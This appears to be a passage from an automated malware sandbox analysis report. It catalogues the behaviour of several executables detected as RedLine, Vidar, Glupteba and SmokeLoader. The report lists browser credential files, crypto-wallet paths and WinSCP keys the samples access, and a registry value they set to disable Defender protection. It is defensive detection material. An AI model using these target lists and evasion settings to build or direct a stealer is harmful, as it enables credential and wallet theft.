      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Autofill\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\CC\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Cookies\Edge_Cookies.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Cookies\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Cookies\IE_Cookies.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Downloads\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Files\Default.zip VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\History\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\information.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Queries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\passwords.txt VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Queries volume information: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Queries volume information: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Queries volume information: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\SysWOW64\Macromed\Flash\activex.vch VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Queries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Queries volume information: C:\Program Files (x86)\Company\NewProduct\tmp.edb VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Queries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Queries volume information: C:\Program Files (x86)\Company\NewProduct\d.jfm VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Queries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Queries volume information: C:\Program Files (x86)\Company\NewProduct\d VolumeInformation
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: 1_2_01253308 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: 1_2_0122F760 GetComputerNameA,GlobalAlloc,LookupAccountNameA,GetLastError,GetLastError,ConvertSidToStringSidA,GetLastError,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Code function: 5_2_004710D2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Code function: 4_2_0043BF20 GetComputerNameA,CompareStringW,GetVersionExA,OpenWaitableTimerW,CreateDirectoryW,GetModuleHandleW,WriteFileGather,GetWindowsDirectoryA,GetConsoleTitleW,VerifyVersionInfoW,RtlInitializeCriticalSection,AreFileApisANSI,CompareStringW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings:

      Disable Windows Defender real time protection (registry)
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

      Stealing of Sensitive Information:

      Yara detected Glupteba
      Source: Yara match File source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara match File source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE
      Yara detected RedLine Stealer
      Source: Yara match File source: 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 7008, type: MEMORY
      Source: Yara match File source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240, type: MEMORY
      Source: Yara match File source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.unpack, type: UNPACKEDPE
      Yara detected SmokeLoader
      Source: Yara match File source: 30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack, type: UNPACKEDPE
      Yara detected Vidar stealer
      Source: Yara match File source: 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000003.718547509.0000000002620000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.984787263.0000000002580000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000003.729200820.0000000002670000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: ZteJ0k9a2sM9jXcC3SndaipD.exe PID: 5988, type: MEMORY
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack, type: UNPACKEDPE
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp String found in binary or memory: ElectrumRule
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.1006010528.00000000028E5000.00000004.00000040.sdmp String found in binary or memory: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Wallets\ElectronCashCURRENT
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp String found in binary or memory: JaxxRule
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp String found in binary or memory: Exodus+\Exodus\exodus.wallet
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.1006010528.00000000028E5000.00000004.00000040.sdmp String found in binary or memory: \Wallets\ElectrumLTC4794,
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp String found in binary or memory: ExodusRule
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.1006010528.00000000028E5000.00000004.00000040.sdmp String found in binary or memory: \Wallets\MultiDogeshes\
      Source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp String found in binary or memory: set_UseMachineKeyStore
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Directory queried: C:\Users\user\Documents
      Source: Yara match File source: 0000000B.00000002.994142610.0000000000ACA000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.972549932.0000000000A4A000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      Yara detected Glupteba
      Source: Yara match File source: Process Memory Space: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476, type: MEMORY
      Source: Yara match File source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.37e0000.0.unpack, type: UNPACKEDPE
      Yara detected RedLine Stealer
      Source: Yara match File source: 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 7008, type: MEMORY
      Source: Yara match File source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240, type: MEMORY
      Source: Yara match File source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 4.3.9PWySv_SmMZ5POEp2PUJ_lbI.exe.afd0b0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.407d438.1.unpack, type: UNPACKEDPE
      Yara detected SmokeLoader
      Source: Yara match File source: 30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack, type: UNPACKEDPE
      Yara detected Vidar stealer
      Source: Yara match File source: 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000003.718547509.0000000002620000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.984787263.0000000002580000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000003.729200820.0000000002670000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: ZteJ0k9a2sM9jXcC3SndaipD.exe PID: 5988, type: MEMORY
